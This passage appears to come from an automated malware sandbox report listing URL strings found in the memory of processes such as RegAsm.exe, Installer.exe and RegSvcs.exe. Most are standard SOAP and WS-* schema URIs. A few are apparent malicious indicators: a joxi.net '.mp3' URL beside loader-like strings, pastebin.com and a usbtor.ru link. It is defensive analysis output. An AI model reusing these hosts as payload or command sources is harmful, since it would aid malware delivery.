                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                  Source: Installer.exe, 00000016.00000002.2283720664.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, Installer.exe.20.drString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3
                  Source: Installer.exe, 00000016.00000002.2283720664.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp37zF
                  Source: Installer.exe, 00000016.00000000.2271893841.0000000000314000.00000002.00000001.01000000.0000000D.sdmp, Installer.exe, 00000016.00000002.2282223412.0000000000314000.00000002.00000001.01000000.0000000D.sdmp, Installer.exe.20.drString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3openSizeofResourcegfDASrtdstyfewrtydwyu3467YdesauydgewyuyVirtualPr
                  Source: Installer.exe, 00000016.00000002.2283720664.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3r
                  Source: Installer.exe, 00000016.00000002.2283720664.0000000000E30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://joxi.net/SettingsnsLMEM8
                  Source: powershell.exe, 0000001A.00000002.2313653824.0000000005F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: Installer.exe.20.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003226000.00000004.00000800.00020000.00000000.sdmp, Installer.exe.20.dr, conhost.exe.3.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.0000000003407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.0000000003407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comd
                  Source: powershell.exe, 0000001A.00000002.2304314220.0000000005075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: powershell.exe, 0000001A.00000002.2304314220.0000000005075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.2339213093.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2304314220.0000000004F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                  Source: powershell.exe, 0000001A.00000002.2304314220.0000000005075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000031BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2216914083.00000000031BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24ResponseD
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000031BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                  Source: RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                  Source: conhost.exe, 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmp, conhost.exe.3.drString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
